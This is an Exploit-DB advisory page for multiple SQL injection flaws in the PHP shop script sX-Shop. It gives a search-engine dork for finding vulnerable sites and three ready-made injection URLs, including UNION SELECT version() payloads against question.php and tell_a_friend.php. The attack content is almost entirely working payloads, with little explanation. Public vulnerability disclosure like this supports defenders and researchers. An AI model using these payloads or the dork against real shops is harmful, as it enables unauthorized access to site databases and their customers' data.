sX-Shop - Multiple SQL Injections

EDB-ID:

14558

CVE:

N/A


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2010-08-05


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

########################################################################################

sX-Shop SQL Injection Vulnerabilities

########################################################################################

Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/

########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################